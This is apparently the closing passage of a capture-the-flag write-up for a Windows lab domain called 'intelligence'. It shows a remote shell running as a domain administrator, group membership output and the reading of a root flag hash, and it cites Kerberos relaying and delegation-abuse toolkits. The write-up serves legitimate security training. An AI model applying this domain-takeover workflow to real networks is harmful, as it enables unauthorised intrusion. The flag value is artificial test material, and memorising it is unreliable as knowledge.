[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
intelligence\administrator
C:\>whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=================================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
intelligence\Group Policy Creator Owners Group S-1-5-21-4210132550-3389855604-3437519686-520 Mandatory group, Enabled by default, Enabled group
intelligence\Domain Admins Group S-1-5-21-4210132550-3389855604-3437519686-512 Mandatory group, Enabled by default, Enabled group
intelligence\Enterprise Admins Group S-1-5-21-4210132550-3389855604-3437519686-519 Mandatory group, Enabled by default, Enabled group
intelligence\Schema Admins Group S-1-5-21-4210132550-3389855604-3437519686-518 Mandatory group, Enabled by default, Enabled group
Service asserted identity Well-known group S-1-18-2 Mandatory group, Enabled by default, Enabled group
intelligence\Denied RODC Password Replication Group Alias S-1-5-21-4210132550-3389855604-3437519686-572 Mandatory group, Enabled by default, Enabled group, Local Group
Read flag: root.txt¶
C:\>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is E3EF-EBBD
Directory of C:\Users\Administrator\Desktop
04/18/2021 05:51 PM <DIR> .
04/18/2021 05:51 PM <DIR> ..
05/07/2023 03:38 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,850,173,440 bytes free
C:\Users\Administrator\Desktop>type root.txt
4e1748910b9d23131132c5158a956150
References¶
Krbrelayx - Kerberos relaying and unconstrained delegation abuse toolkit Abusing Kerberos From Linux - An Overview of Available Tools